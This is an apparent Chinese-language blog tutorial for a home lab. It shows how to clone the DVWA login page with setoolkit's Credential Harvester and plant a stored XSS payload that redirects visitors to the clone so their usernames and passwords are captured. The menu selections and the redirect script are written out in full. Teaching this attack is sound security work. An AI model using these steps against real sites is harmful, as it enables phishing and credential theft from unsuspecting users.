XSS漏洞-XSS攻击实例(十)

1.1 持久性XSS窃取用户信息

1.1.1 制作钓鱼网站

使用setoolkit克隆站点,setoolkit是一个万能的社工工具(社会工程学工具集合)

# setoolkit
Do you agree to the terms of service [y/n]: y   # 同意服务条款

1.1.1.1 选择1社会工程攻击

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
  • 菜单解释:

1) 社会工程攻击

2) 渗透测试(快速通道)

3) 第三方模块

4) 更新Social-Engineer Toolkit

5) 更新SET配置

6) 帮助,积分和关于

99) 退出Social-Engineer Toolkit

1.1.1.2 选择2网站攻击载体

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.

set> 2
  • 菜单解释:

1) 鱼叉式网络钓鱼攻击载体

2) 网站攻击向量

3) 传染性媒体生成器

4) 创建有效负载和侦听器

5) 大规模邮件攻击

6) 基于Arduino的攻击向量

7) 无线接入点攻击向量

8) QRcode生成器攻击向量

9) PowerShell 攻击向量

10) 第三方模块

99) 返回主菜单。

1.1.1.3 选择3凭证收割机攻击方法

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) HTA Attack Method

  99) Return to Main Menu

set:webattack>3
  • 菜单解释:

1) Java Applet攻击方法

2) Metasploit浏览器攻击方法

3) 凭证收集器攻击方法

4) Tabnabbing攻击方法

5) Web Jacking攻击方法

6)多攻击Web方法

7) HTA攻击方法

99) 返回主菜单。

1.1.1.4 选择2站点克隆

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
  • 菜单解释:

1) web模板

2) 站点克隆

3) 自定义导入

99) 返回主菜单。

1.1.1.5 设置侦听IP地址保持默认回车即可

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.10.180]:

1.1.1.6 输入URL进行克隆

set:webattack> Enter the url to clone:http://192.168.10.159/DVWA/login.php
# 因为我们前面小节启动了apache 所以80端口是占用的状态,所以我们可以在这里输入y关闭apache
Do you want to attempt to disable Apache  [y/n]: y

1.1.1.7 查看克隆后网站

从外观上来看和真实的站点并没有什么不同:

图片[1]|XSS漏洞-XSS攻击实例(十)|leon的博客

我们可以看到页面又重新跳转回了DVWA站点,也就是真实站点中。

图片[2]|XSS漏洞-XSS攻击实例(十)|leon的博客

我们回到setoolkit查看,已经记录下了在我们克隆站点输入的用户名密码信息。

图片[3]|XSS漏洞-XSS攻击实例(十)|leon的博客

1.1.2 进行存储型XSS页面跳转

1.1.2.1 修改源码增加输入长度

图片[4]|XSS漏洞-XSS攻击实例(十)|leon的博客

1.1.2.2 构造攻击脚本

<script>window.location="http://192.168.10.180/"</script>

1.1.2.3 执行攻击

图片[5]|XSS漏洞-XSS攻击实例(十)|leon的博客

点击提交之后会自动跳转到克隆站点,每次访问该页面都会跳转到克隆站点,只要在克隆站点登录账户信息就会被记录。

温馨提示:本文最后更新于2022-12-20 20:57:35,已超过436天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/2666.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享